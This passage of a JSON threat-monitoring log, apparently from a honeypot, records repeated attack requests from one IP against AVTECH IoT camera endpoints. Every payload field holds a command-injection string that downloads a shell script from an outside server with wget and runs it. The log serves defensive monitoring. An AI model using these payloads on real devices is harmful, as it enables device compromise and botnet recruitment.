2113.       "target_port": 3105,
2114.       "protocol": "tcp",
2115.       "tags": [
2116.         {
2117.           "cve": "",
2118.           "category": "IoT",
2119.           "description": "AVTECH Exploit"
2120.         }
2121.       ],
2122.       "event_count": 2,
2123.       "first_seen": "2020-06-01T05:27:21Z",
2124.       "last_seen": "2020-06-01T05:34:43Z"
2125.     },
2126.     {
2127.       "event_id": "1fdd7968a2853ca1947240c17ee720cc515ee6ab9dc400e9d7e9183c2e9e5903",
2128.       "source_ip_address": "193.142.146.34",
2129.       "country": "NL",
2130.       "user_agent": "Snickers-Avtech",
2131.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2132.       "post_data": "",
2133.       "target_port": 8139,
2134.       "protocol": "tcp",
2135.       "tags": [
2136.         {
2137.           "cve": "",
2138.           "category": "IoT",
2139.           "description": "AVTECH Exploit"
2140.         }
2141.       ],
2142.       "event_count": 3,
2143.       "first_seen": "2020-06-01T05:01:15Z",
2144.       "last_seen": "2020-06-01T05:34:35Z"
2145.     },
2146.     {
2147.       "event_id": "851ee6af0942ef0a985e243b3eb0a1eecf69ab20fab7fa6a82e942247f5a6149",
2148.       "source_ip_address": "193.142.146.34",
2149.       "country": "NL",
2150.       "user_agent": "Snickers-Avtech",
2151.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2152.       "post_data": "",
2153.       "target_port": 8139,
2154.       "protocol": "tcp",
2155.       "tags": [
2156.         {
2157.           "cve": "",
2158.           "category": "IoT",
2159.           "description": "AVTECH Exploit"
2160.         }
2161.       ],
2162.       "event_count": 3,
2163.       "first_seen": "2020-06-01T05:01:07Z",
2164.       "last_seen": "2020-06-01T05:34:29Z"
2165.     },
2166.     {
2167.       "event_id": "06a27b976880420e50e58b0e78f23b6b2a7f228d4bff638df737e4c4cfa049be",
2168.       "source_ip_address": "193.142.146.34",
2169.       "country": "NL",
2170.       "user_agent": "Snickers-Avtech",
2171.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2172.       "post_data": "",
2173.       "target_port": 37777,
2174.       "protocol": "tcp",
2175.       "tags": [
2176.         {
2177.           "cve": "",
2178.           "category": "IoT",
2179.           "description": "AVTECH Exploit"
2180.         }
2181.       ],
2182.       "event_count": 3,
2183.       "first_seen": "2020-06-01T05:12:20Z",
2184.       "last_seen": "2020-06-01T05:33:59Z"
2185.     },
2186.     {
2187.       "event_id": "700dbb2c4b22690a4a37e53e5dd5b8d24527290805888034bbf4bbbca25eb1f2",
2188.       "source_ip_address": "193.142.146.34",
2189.       "country": "NL",
2190.       "user_agent": "Snickers-Avtech",
2191.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2192.       "post_data": "",
2193.       "target_port": 37777,
2194.       "protocol": "tcp",
2195.       "tags": [
2196.         {
2197.           "cve": "",
2198.           "category": "IoT",
2199.           "description": "AVTECH Exploit"
2200.         }
2201.       ],
2202.       "event_count": 3,
2203.       "first_seen": "2020-06-01T05:12:11Z",
2204.       "last_seen": "2020-06-01T05:33:54Z"
2205.     },
2206.     {
2207.       "event_id": "6538e4ac4bfe72c949c61d277a487c85af3e97dfd6531ad9fe7b05932dc3bbc6",
2208.       "source_ip_address": "193.142.146.34",
2209.       "country": "NL",
2210.       "user_agent": "Snickers-Avtech",
2211.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2212.       "post_data": "",
2213.       "target_port": 8095,
2214.       "protocol": "tcp",
2215.       "tags": [
2216.         {
2217.           "cve": "",
2218.           "category": "IoT",
2219.           "description": "AVTECH Exploit"
2220.         }
2221.       ],
2222.       "event_count": 3,
2223.       "first_seen": "2020-06-01T05:25:30Z",
2224.       "last_seen": "2020-06-01T05:32:20Z"
2225.     },
2226.     {
2227.       "event_id": "9795aba138df0280f1278f4e4d79e2ddc750549423bdbca5eecdece3ef5cb654",
2228.       "source_ip_address": "193.142.146.34",
2229.       "country": "NL",
2230.       "user_agent": "Snickers-Avtech",
2231.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2232.       "post_data": "",
2233.       "target_port": 8095,
2234.       "protocol": "tcp",
2235.       "tags": [
2236.         {
2237.           "cve": "",
2238.           "category": "IoT",
2239.           "description": "AVTECH Exploit"
2240.         }
2241.       ],
2242.       "event_count": 3,
2243.       "first_seen": "2020-06-01T05:25:22Z",
2244.       "last_seen": "2020-06-01T05:32:14Z"
2245.     },
2246.     {
2247.       "event_id": "550cb6969c2c29465d0e84d5ed735e9700fe5266f6065c353284ea7a51fa3446",
2248.       "source_ip_address": "193.142.146.34",
2249.       "country": "NL",
2250.       "user_agent": "Snickers-Avtech",
2251.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2252.       "post_data": "",
2253.       "target_port": 8791,
2254.       "protocol": "tcp",
2255.       "tags": [
2256.         {
2257.           "cve": "",
2258.           "category": "IoT",
2259.           "description": "AVTECH Exploit"
2260.         }
2261.       ],
2262.       "event_count": 3,
2263.       "first_seen": "2020-06-01T05:14:56Z",
2264.       "last_seen": "2020-06-01T05:32:00Z"
2265.     },
2266.     {
2267.       "event_id": "85e4ed3c7716c60799d38a5a777a650ecfbb879c0b8a0c803befd0599fad83bb",
2268.       "source_ip_address": "193.142.146.34",
2269.       "country": "NL",
2270.       "user_agent": "Snickers-Avtech",
2271.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2272.       "post_data": "",
2273.       "target_port": 5269,
2274.       "protocol": "tcp",
2275.       "tags": [
2276.         {
2277.           "cve": "",
2278.           "category": "IoT",
2279.           "description": "AVTECH Exploit"
2280.         }
2281.       ],
2282.       "event_count": 2,
2283.       "first_seen": "2020-06-01T05:19:08Z",
2284.       "last_seen": "2020-06-01T05:31:59Z"
2285.     },
2286.     {
2287.       "event_id": "7c6d5fd4615f186cedb1e647796b8899cecdaa51588b6d0fbf1e89de7bc9def7",
2288.       "source_ip_address": "193.142.146.34",
2289.       "country": "NL",
2290.       "user_agent": "Snickers-Avtech",
2291.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2292.       "post_data": "",
2293.       "target_port": 5269,
2294.       "protocol": "tcp",
2295.       "tags": [
2296.         {
2297.           "cve": "",
2298.           "category": "IoT",
2299.           "description": "AVTECH Exploit"
2300.         }
2301.       ],
2302.       "event_count": 2,
2303.       "first_seen": "2020-06-01T05:19:01Z",
2304.       "last_seen": "2020-06-01T05:31:54Z"
2305.     },
2306.     {
2307.       "event_id": "60c7a6bc3503f271eb02ceec1478c794387085f5b7730d7ee480ac9f4a1d28c3",
2308.       "source_ip_address": "193.142.146.34",
2309.       "country": "NL",
2310.       "user_agent": "Snickers-Avtech",
2311.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2312.       "post_data": "",
2313.       "target_port": 8791,
2314.       "protocol": "tcp",
2315.       "tags": [
2316.         {
2317.           "cve": "",
2318.           "category": "IoT",
2319.           "description": "AVTECH Exploit"
2320.         }
2321.       ],
2322.       "event_count": 3,
2323.       "first_seen": "2020-06-01T05:14:49Z",
2324.       "last_seen": "2020-06-01T05:31:54Z"
2325.     },
2326.     {
2327.       "event_id": "ac8437dfd66429178daabecb191d3627cf1f5cce9f9a4a0a5aa0a57dbadf8496",
2328.       "source_ip_address": "193.142.146.34",
2329.       "country": "NL",
2330.       "user_agent": "Snickers-Avtech",
2331.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2332.       "post_data": "",
2333.       "target_port": 8888,
2334.       "protocol": "tcp",
2335.       "tags": [
2336.         {
2337.           "cve": "",
2338.           "category": "IoT",
2339.           "description": "AVTECH Exploit"
2340.         }
2341.       ],
2342.       "event_count": 5,
2343.       "first_seen": "2020-06-01T05:00:27Z",
2344.       "last_seen": "2020-06-01T05:31:52Z"
2345.     },
2346.     {
2347.       "event_id": "2b407ce19020fea1e0aa41fe8373617bc9b855e52611313c3e9321da73efc22d",
2348.       "source_ip_address": "193.142.146.34",
2349.       "country": "NL",
2350.       "user_agent": "Snickers-Avtech",
2351.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2352.       "post_data": "",
2353.       "target_port": 8888,
2354.       "protocol": "tcp",
2355.       "tags": [
2356.         {
2357.           "cve": "",
2358.           "category": "IoT",
2359.           "description": "AVTECH Exploit"
2360.         }
2361.       ],
2362.       "event_count": 5,
2363.       "first_seen": "2020-06-01T05:00:21Z",
2364.       "last_seen": "2020-06-01T05:31:47Z"
2365.     },
2366.     {
2367.       "event_id": "d45973ea0055018f8f85b929a4ef827e7c9e7f7a92590e0bdf653c2e784c25cf",
2368.       "source_ip_address": "193.142.146.34",
2369.       "country": "NL",
2370.       "user_agent": "Snickers-Avtech",
2371.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2372.       "post_data": "",
2373.       "target_port": 10000,
2374.       "protocol": "tcp",
2375.       "tags": [
2376.         {
2377.           "cve": "",
2378.           "category": "IoT",
2379.           "description": "AVTECH Exploit"
2380.         }
2381.       ],
2382.       "event_count": 4,
2383.       "first_seen": "2020-06-01T05:18:22Z",
2384.       "last_seen": "2020-06-01T05:31:01Z"
2385.     },
2386.     {
2387.       "event_id": "58579cfc4ab75e71d0c34fa6daec768e46a6c50b73e2b255e9c000727c0936ae",
2388.       "source_ip_address": "193.142.146.34",
2389.       "country": "NL",
2390.       "user_agent": "Snickers-Avtech",
2391.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2392.       "post_data": "",
2393.       "target_port": 10000,
2394.       "protocol": "tcp",
2395.       "tags": [
2396.         {
2397.           "cve": "",
2398.           "category": "IoT",
2399.           "description": "AVTECH Exploit"
2400.         }
2401.       ],
2402.       "event_count": 4,
2403.       "first_seen": "2020-06-01T05:18:14Z",
2404.       "last_seen": "2020-06-01T05:30:55Z"
2405.     },
2406.     {
2407.       "event_id": "8ab74190c22e432afc8cd1caa7c92bbdb2cc385a23f94eb5757e110bbbfa6a6f",
2408.       "source_ip_address": "193.142.146.34",
2409.       "country": "NL",
2410.       "user_agent": "Snickers-Avtech",
2411.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2412.       "post_data": "",
2413.       "target_port": 5984,
2414.       "protocol": "tcp",
2415.       "tags": [
2416.         {
2417.           "cve": "",
2418.           "category": "IoT",
2419.           "description": "AVTECH Exploit"
2420.         }
2421.       ],
2422.       "event_count": 2,
2423.       "first_seen": "2020-06-01T05:02:57Z",
2424.       "last_seen": "2020-06-01T05:30:32Z"
2425.     },
2426.     {
2427.       "event_id": "2ce2b67393db0597c83ccbb5a1757597d97ba4778f6c109b338c9a04cd4fe88d",
2428.       "source_ip_address": "193.142.146.34",
2429.       "country": "NL",
2430.       "user_agent": "Snickers-Avtech",
2431.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2432.       "post_data": "",
2433.       "target_port": 5984,
2434.       "protocol": "tcp",
2435.       "tags": [
2436.         {
2437.           "cve": "",
2438.           "category": "IoT",
2439.           "description": "AVTECH Exploit"
2440.         }
2441.       ],
2442.       "event_count": 2,
2443.       "first_seen": "2020-06-01T05:02:49Z",
2444.       "last_seen": "2020-06-01T05:30:25Z"
2445.     },
2446.     {
2447.       "event_id": "ecc35cd979ba20c607252e7f8376094516a2d9dfc000f2d71647681ec7a639f4",
2448.       "source_ip_address": "193.142.146.34",
2449.       "country": "NL",
2450.       "user_agent": "Snickers-Avtech",
2451.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2452.       "post_data": "",
2453.       "target_port": 5431,
2454.       "protocol": "tcp",
2455.       "tags": [
2456.         {
2457.           "cve": "",
2458.           "category": "IoT",
2459.           "description": "AVTECH Exploit"
2460.         }
2461.       ],
2462.       "event_count": 2,
2463.       "first_seen": "2020-06-01T05:16:06Z",
2464.       "last_seen": "2020-06-01T05:28:55Z"
2465.     },
2466.     {
2467.       "event_id": "1a708aa5570a71c6f5e46144af4da6c9876c97103718db30ec6b31cffea1feb5",
2468.       "source_ip_address": "193.142.146.34",
2469.       "country": "NL",
2470.       "user_agent": "Snickers-Avtech",
2471.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2472.       "post_data": "",
2473.       "target_port": 5431,
2474.       "protocol": "tcp",
2475.       "tags": [
2476.         {
2477.           "cve": "",
2478.           "category": "IoT",
2479.           "description": "AVTECH Exploit"
2480.         }
2481.       ],
2482.       "event_count": 2,
2483.       "first_seen": "2020-06-01T05:15:59Z",
2484.       "last_seen": "2020-06-01T05:28:50Z"
2485.     },
2486.     {
2487.       "event_id": "155136251cfa4c078aea285ed05b1b00d676a0b69afa8088164bc5958313d3eb",
2488.       "source_ip_address": "193.142.146.34",
2489.       "country": "NL",
2490.       "user_agent": "Snickers-Avtech",
2491.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2492.       "post_data": "",
2493.       "target_port": 8779,
2494.       "protocol": "tcp",
2495.       "tags": [
2496.         {
2497.           "cve": "",
2498.           "category": "IoT",
2499.           "description": "AVTECH Exploit"
2500.         }
2501.       ],
2502.       "event_count": 1,
2503.       "first_seen": "2020-06-01T05:28:45Z",
2504.       "last_seen": "2020-06-01T05:28:45Z"
2505.     },
2506.     {
2507.       "event_id": "461b57ee5b371299f8d838b1ee1a16b80ac4b0e79e4afb4caeadd2eee3205d75",
2508.       "source_ip_address": "193.142.146.34",
2509.       "country": "NL",
2510.       "user_agent": "Snickers-Avtech",
2511.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2512.       "post_data": "",
2513.       "target_port": 2087,
2514.       "protocol": "tcp",
2515.       "tags": [
2516.         {
2517.           "cve": "",
2518.           "category": "IoT",
2519.           "description": "AVTECH Exploit"
2520.         }
2521.       ],
2522.       "event_count": 4,
2523.       "first_seen": "2020-06-01T05:02:38Z",
2524.       "last_seen": "2020-06-01T05:28:40Z"
2525.     },
2526.     {
2527.       "event_id": "144a20753a418a93210129383042d66bad5b9b757817faaa9a5674edf0859e4f",
2528.       "source_ip_address": "193.142.146.34",
2529.       "country": "NL",
2530.       "user_agent": "Snickers-Avtech",
2531.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2532.       "post_data": "",
2533.       "target_port": 8779,
2534.       "protocol": "tcp",
2535.       "tags": [
2536.         {
2537.           "cve": "",
2538.           "category": "IoT",
2539.           "description": "AVTECH Exploit"
2540.         }
2541.       ],
2542.       "event_count": 1,
2543.       "first_seen": "2020-06-01T05:28:40Z",
2544.       "last_seen": "2020-06-01T05:28:40Z"
2545.     },
2546.     {
2547.       "event_id": "90b9db26581675031c409e3a2ee322ba1a333a4e0a70de37423bb5ccd313413c",
2548.       "source_ip_address": "193.142.146.34",
2549.       "country": "NL",
2550.       "user_agent": "Snickers-Avtech",
2551.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2552.       "post_data": "",
2553.       "target_port": 2087,
2554.       "protocol": "tcp",
2555.       "tags": [
2556.         {
2557.           "cve": "",
2558.           "category": "IoT",
2559.           "description": "AVTECH Exploit"
2560.         }
2561.       ],
2562.       "event_count": 4,
2563.       "first_seen": "2020-06-01T05:02:30Z",
2564.       "last_seen": "2020-06-01T05:28:34Z"
2565.     },
2566.     {
2567.       "event_id": "292542de228769d0bd0ef737b0cf220a190c3b5b9bd1ce5e19186220321ff9dd",
2568.       "source_ip_address": "193.142.146.34",
2569.       "country": "NL",
2570.       "user_agent": "Snickers-Avtech",
2571.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2572.       "post_data": "",
2573.       "target_port": 2626,
2574.       "protocol": "tcp",
2575.       "tags": [
2576.         {
2577.           "cve": "",
2578.           "category": "IoT",
2579.           "description": "AVTECH Exploit"
2580.         }
2581.       ],
2582.       "event_count": 1,
2583.       "first_seen": "2020-06-01T05:28:28Z",
2584.       "last_seen": "2020-06-01T05:28:28Z"
2585.     },
2586.     {
2587.       "event_id": "d93c58d065640d51dccea99e2f5f0305738a7c42c3333a7df56817a6eb38b0d4",
2588.       "source_ip_address": "193.142.146.34",
2589.       "country": "NL",
2590.       "user_agent": "Snickers-Avtech",
2591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2592.       "post_data": "",
2593.       "target_port": 2626,
2594.       "protocol": "tcp",
2595.       "tags": [
2596.         {
2597.           "cve": "",
2598.           "category": "IoT",
2599.           "description": "AVTECH Exploit"
2600.         }
2601.       ],
2602.       "event_count": 1,
2603.       "first_seen": "2020-06-01T05:28:23Z",
2604.       "last_seen": "2020-06-01T05:28:23Z"
2605.     },
2606.     {
2607.       "event_id": "fb8b4aebd29e118403a3c8d1b4f4a85d628b1e383729b02f9fc5f7efa1624252",
2608.       "source_ip_address": "193.142.146.34",
2609.       "country": "NL",
2610.       "user_agent": "Snickers-Avtech",
2611.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2612.       "post_data": "",
2613.       "target_port": 8000,
2614.       "protocol": "tcp",
2615.       "tags": [
2616.         {
2617.           "cve": "",
2618.           "category": "IoT",
2619.           "description": "AVTECH Exploit"
2620.         }
2621.       ],
2622.       "event_count": 3,
2623.       "first_seen": "2020-06-01T05:01:17Z",
2624.       "last_seen": "2020-06-01T05:28:17Z"
2625.     },
2626.     {
2627.       "event_id": "b2922173b6871936cd5b106b7f80c27292acc9e35d552634c64d67460c010e9b",
2628.       "source_ip_address": "193.142.146.34",
2629.       "country": "NL",
2630.       "user_agent": "Snickers-Avtech",
2631.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2632.       "post_data": "",
2633.       "target_port": 8623,
2634.       "protocol": "tcp",
2635.       "tags": [
2636.         {
2637.           "cve": "",
2638.           "category": "IoT",
2639.           "description": "AVTECH Exploit"
2640.         }
2641.       ],
2642.       "event_count": 1,
2643.       "first_seen": "2020-06-01T05:28:16Z",
2644.       "last_seen": "2020-06-01T05:28:16Z"
2645.     },
2646.     {
2647.       "event_id": "a5b1e34bc1a1533f62c164d5cb42551ff733a0a98e2fa2b37aab3f3a232a1ec8",
2648.       "source_ip_address": "193.142.146.34",
2649.       "country": "NL",
2650.       "user_agent": "Snickers-Avtech",
2651.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2652.       "post_data": "",
2653.       "target_port": 8000,
2654.       "protocol": "tcp",
2655.       "tags": [
2656.         {
2657.           "cve": "",
2658.           "category": "IoT",
2659.           "description": "AVTECH Exploit"
2660.         }
2661.       ],
2662.       "event_count": 3,
2663.       "first_seen": "2020-06-01T05:01:09Z",
2664.       "last_seen": "2020-06-01T05:28:12Z"
2665.     },
2666.     {
2667.       "event_id": "70b375b1c3a547c5f5239199682ce31b2c77b3177ef966e4b0b1f1737e585551",
2668.       "source_ip_address": "193.142.146.34",
2669.       "country": "NL",
2670.       "user_agent": "Snickers-Avtech",
2671.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2672.       "post_data": "",
2673.       "target_port": 8623,
2674.       "protocol": "tcp",
2675.       "tags": [
2676.         {
2677.           "cve": "",
2678.           "category": "IoT",
2679.           "description": "AVTECH Exploit"
2680.         }
2681.       ],
2682.       "event_count": 1,
2683.       "first_seen": "2020-06-01T05:28:10Z",
2684.       "last_seen": "2020-06-01T05:28:10Z"
2685.     },
2686.     {
2687.       "event_id": "008e7678942001d6e4eccca5d5179f3833b8a701af4e96b21492a5c88ffd39c6",
2688.       "source_ip_address": "193.142.146.34",
2689.       "country": "NL",
2690.       "user_agent": "Snickers-Avtech",
2691.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2692.       "post_data": "",
2693.       "target_port": 4567,
2694.       "protocol": "tcp",
2695.       "tags": [
2696.         {
2697.           "cve": "",
2698.           "category": "IoT",
2699.           "description": "AVTECH Exploit"
2700.         }
2701.       ],
2702.       "event_count": 4,
2703.       "first_seen": "2020-06-01T05:09:18Z",
2704.       "last_seen": "2020-06-01T05:27:55Z"
2705.     },
2706.     {
2707.       "event_id": "e2b761072243931d8b70ec663af5276003428695e8b9757d8ac081cbe474625c",
2708.       "source_ip_address": "193.142.146.34",
2709.       "country": "NL",
2710.       "user_agent": "Snickers-Avtech",
2711.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2712.       "post_data": "",
2713.       "target_port": 4567,
2714.       "protocol": "tcp",
2715.       "tags": [
2716.         {
2717.           "cve": "",
2718.           "category": "IoT",
2719.           "description": "AVTECH Exploit"
2720.         }
2721.       ],
2722.       "event_count": 4,
2723.       "first_seen": "2020-06-01T05:09:11Z",
2724.       "last_seen": "2020-06-01T05:27:49Z"
2725.     },
2726.     {
2727.       "event_id": "50094628c6c696e4085b2fc940583c385145b5859a18408cd4eb0f5544edc813",
2728.       "source_ip_address": "193.142.146.34",
2729.       "country": "NL",
2730.       "user_agent": "Snickers-Avtech",
2731.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2732.       "post_data": "",
2733.       "target_port": 9200,
2734.       "protocol": "tcp",
2735.       "tags": [
2736.         {
2737.           "cve": "",
2738.           "category": "IoT",
2739.           "description": "AVTECH Exploit"
2740.         }
2741.       ],
2742.       "event_count": 4,
2743.       "first_seen": "2020-06-01T05:03:10Z",
2744.       "last_seen": "2020-06-01T05:27:36Z"
2745.     },
2746.     {
2747.       "event_id": "7bb54b269a449f5ae24f60eccbc846701924a2723b655483e02e18eca1f984ec",
2748.       "source_ip_address": "193.142.146.34",
2749.       "country": "NL",
2750.       "user_agent": "Snickers-Avtech",
2751.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
2752.       "post_data": "",
2753.       "target_port": 60001,
2754.       "protocol": "tcp",
2755.       "tags": [
2756.         {
2757.           "cve": "",
2758.           "category": "IoT",
2759.           "description": "AVTECH Exploit"
2760.         }
2761.       ],
2762.       "event_count": 3,
2763.       "first_seen": "2020-06-01T05:16:31Z",
2764.       "last_seen": "2020-06-01T05:27:34Z"
2765.     },
2766.     {
2767.       "event_id": "5e5f1319935f6abcae16d524870ba3eece3fc0263e9a05abc8ac23d5112e65aa",
2768.       "source_ip_address": "193.142.146.34",
2769.       "country": "NL",
2770.       "user_agent": "Snickers-Avtech",
2771.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
2772.       "post_data": "",
2773.       "target_port": 9200,
2774.       "protocol": "tcp",
2775.       "tags": [
2776.         {
2777.           "cve": "",
2778.           "category": "IoT",
2779.           "description": "AVTECH Exploit"
2780.         }
2781.       ],
2782.       "event_count": 4,
2783.       "first_seen": "2020-06-01T05:03:03Z",
2784.       "last_seen": "2020-06-01T05:27:31Z"
2785.     },
2786.     {
